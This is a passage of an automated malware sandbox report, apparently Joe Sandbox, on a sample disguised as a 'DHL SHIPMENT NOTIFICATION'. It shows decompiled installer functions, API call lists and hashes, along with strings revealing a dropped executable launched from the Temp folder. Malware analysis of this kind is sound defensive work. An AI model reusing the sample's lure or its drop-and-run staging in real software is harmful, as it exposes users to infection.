                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                        • String ID:
                        • API String ID: 2972824698-0
                        • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                        • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                        • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                        • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                        0x00405817
                        0x0040581d
                        0x00405827
                        0x0040582a
                        0x004059c0
                        0x004059e4
                        0x004059e4
                        0x004059f7
                        0x00405a15
                        0x00405a17
                        0x00405a1f
                        0x00405a75
                        0x00405a79
                        0x00000000
                        0x00000000
                        0x00405a7b
                        0x00405a81
                        0x00000000
                        0x00000000
                        0x00405a8b
                        0x00405a93
                        0x00405a96
                        0x00405b98
                        0x00000000
                        0x00405b98
                        0x00405aa5
                        0x00405ab0
                        0x00405ab9
                        0x00405ac4
                        0x00405ac7
                        0x00405ad0
                        0x00405ad6
                        0x00405ad9
                        0x00405ad9
                        0x00405af1
                        0x00405afa
                        0x00405afd
                        0x00405b04
                        0x00405b0b
                        0x00405b13
                        0x00405b13
                        0x00405b2a
                        0x00405b2a
                        0x00405b31
                        0x00405b37
                        0x00405b43
                        0x00405b4a
                        0x00405b53
                        0x00405b55
                        0x00405b58
                        0x00405b67
                        0x00405b6a
                        0x00405b70
                        0x00405b71
                        0x00405b77
                        0x00405b78
                        0x00405b79
                        0x00405b81
                        0x00405b8c
                        0x00405b92
                        0x00405b92
                        0x00000000
                        0x00405af1
                        0x00405a27
                        0x00405a57
                        0x00405a5f
                        0x00405a6a
                        0x00405a6a
                        0x00405a70
                        0x00000000
                        0x00405a70
                        0x00405a2b
                        0x00405a35
                        0x00000000
                        0x004059f9
                        0x004059ff
                        0x00405a3a
                        0x00000000
                        0x00405a43
                        0x00405a08
                        0x00405a0d
                        0x00405a10
                        0x00000000
                        0x00405a10
                        0x004059f7
                        0x00405830
                        0x00405834
                        0x0040583c
                        0x00405840
                        0x00405843
                        0x00405846
                        0x00405849
                        0x0040584c
                        0x0040584d
                        0x0040584e
                        0x00405867
                        0x0040586a
                        0x00405874
                        0x00405883
                        0x0040588b
                        0x00405893
                        0x00405898
                        0x0040589b
                        0x004058a7
                        0x004058b0
                        0x004058b9
                        0x004058db
                        0x004058e1
                        0x004058f2
                        0x004058f7
                        0x00405905
                        0x00405913
                        0x00405913
                        0x00405918
                        0x00405926
                        0x00405926
                        0x0040592b
                        0x0040592e
                        0x00405933
                        0x0040593f
                        0x00405948
                        0x00405955
                        0x00405964
                        0x00405957
                        0x0040595c
                        0x0040595c
                        0x00405970
                        0x00405970
                        0x00405984
                        0x0040598d
                        0x00405996
                        0x004059a6
                        0x004059b2
                        0x004059b2
                        0x00000000

                        APIs
                        • GetDlgItem.USER32 ref: 0040586D
                        • GetDlgItem.USER32 ref: 0040587C
                        • GetClientRect.USER32 ref: 004058B9
                        • GetSystemMetrics.USER32 ref: 004058C0
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
                        • ShowWindow.USER32(?,00000008), ref: 0040595C
                        • GetDlgItem.USER32 ref: 0040597D
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                        • GetDlgItem.USER32 ref: 0040588B
                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                        • GetDlgItem.USER32 ref: 004059CF
                        • CreateThread.KERNEL32 ref: 004059DD
                        • CloseHandle.KERNEL32(00000000), ref: 004059E4
                        • ShowWindow.USER32(00000000), ref: 00405A08
                        • ShowWindow.USER32(?,00000008), ref: 00405A0D
                        • ShowWindow.USER32(00000008), ref: 00405A57
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                        • CreatePopupMenu.USER32 ref: 00405A9C
                        • AppendMenuW.USER32 ref: 00405AB0
                        • GetWindowRect.USER32 ref: 00405AD0
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                        • OpenClipboard.USER32(00000000), ref: 00405B31
                        • EmptyClipboard.USER32 ref: 00405B37
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                        • GlobalLock.KERNEL32 ref: 00405B4D
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                        • SetClipboardData.USER32 ref: 00405B8C
                        • CloseClipboard.USER32 ref: 00405B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 590372296-366298937
                        • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                        • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                        • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                        • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404ABB Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                        0x00404abb
                        0x00404ac1
                        0x00404ac7
                        0x00404ad4
                        0x00404ae2
                        0x00404ae5
                        0x00404aed
                        0x00404af3
                        0x00404af3
                        0x00404aff
                        0x00404b02
                        0x00404b70
                        0x00404b77
                        0x00404c4e
                        0x00404c55
                        0x00404c64
                        0x00404c64
                        0x00404c68
                        0x00404c72
                        0x00404c7f
                        0x00404c81
                        0x00404c81
                        0x00404c8f
                        0x00404c96
                        0x00404c9d
                        0x00404ca0
                        0x00404cdc
                        0x00404cde
                        0x00404ce4
                        0x00404ce9
                        0x00404ced
                        0x00404cef
                        0x00404cef
                        0x00404d0b
                        0x00000000
                        0x00404d0d
                        0x00404d10
                        0x00404d1e
                        0x00404d24
                        0x00404d25
                        0x00404d28
                        0x00404d2b
                        0x00000000
                        0x00404d2b
                        0x00404ca2
                        0x00404ca4
                        0x00404ca8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404caa
                        0x00404caa
                        0x00404cb7
                        0x00404cbc
                        0x00000000
                        0x00000000
                        0x00404cc0
                        0x00404cc2
                        0x00404cc2
                        0x00404ccb
                        0x00404ccd
                        0x00404cd2
                        0x00404cd5
                        0x00404cda
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404cda
                        0x00404d37
                        0x00404d41
                        0x00404d44
                        0x00404d47
                        0x00404d4e
                        0x00404d4e
                        0x00404d50
                        0x00404d50
                        0x00404d55
                        0x00404d57
                        0x00404d5f
                        0x00404d66
                        0x00404d68
                        0x00404d73
                        0x00404d73
                        0x00404d68
                        0x00404d83
                        0x00404d8d
                        0x00404d95
                        0x00404db0
                        0x00404d97
                        0x00404da0
                        0x00404da0
                        0x00404d95
                        0x00404db5
                        0x00404dba
                        0x00404dbf
                        0x00404dc8
                        0x00404dc8
                        0x00404dd1
                        0x00404dd3
                        0x00404dd3
                        0x00404ddf
                        0x00404de7
                        0x00404df1
                        0x00404df1
                        0x00404df6
                        0x00000000
                        0x00404df6
                        0x00404ca0
                        0x00404c57
                        0x00404c5e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404c5e
                        0x00404b7d
                        0x00404b86
                        0x00404ba0
                        0x00404ba5
                        0x00404baf
                        0x00404bb6
                        0x00404bc2
                        0x00404bc5
                        0x00404bc8
                        0x00404bcf
                        0x00404bd7
                        0x00404bda
                        0x00404bde
                        0x00404be5
                        0x00404bed
                        0x00404c47
                        0x00404bef
                        0x00404bf0
                        0x00404bf7
                        0x00404c01
                        0x00404c09
                        0x00404c16
                        0x00404c2a
                        0x00404c2e
                        0x00404c2e
                        0x00404c2a
                        0x00404c33
                        0x00404c40
                        0x00404c40
                        0x00404bed
                        0x00000000
                        0x00404ba5
                        0x00404b93
                        0x00000000
                        0x00000000
                        0x00404b99
                        0x00000000
                        0x00404b04
                        0x00404b11
                        0x00404b1a
                        0x00404b27
                        0x00404b27
                        0x00404b2e
                        0x00404b34
                        0x00404b3d
                        0x00404b40
                        0x00404b43
                        0x00404b4b
                        0x00404b4e
                        0x00404b51
                        0x00404b57
                        0x00404b5e
                        0x00404b65
                        0x00404dfc
                        0x00404e0e
                        0x00404b6b
                        0x00404b6e
                        0x00000000
                        0x00404b6e
                        0x00404b65

                        APIs
                        • GetDlgItem.USER32 ref: 00404B0A
                        • SetWindowTextW.USER32(00000000,?), ref: 00404B34
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                        • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,007A1F88,00000000,?,?), ref: 00404C22
                        • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok), ref: 00404C2E
                        • SetDlgItemTextW.USER32 ref: 00404C40
                          • Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5
                          • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                          • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                          • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                          • Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                        • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                          • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                          • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                          • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 2624150263-253651335
                        • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                        • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                        • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                        • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
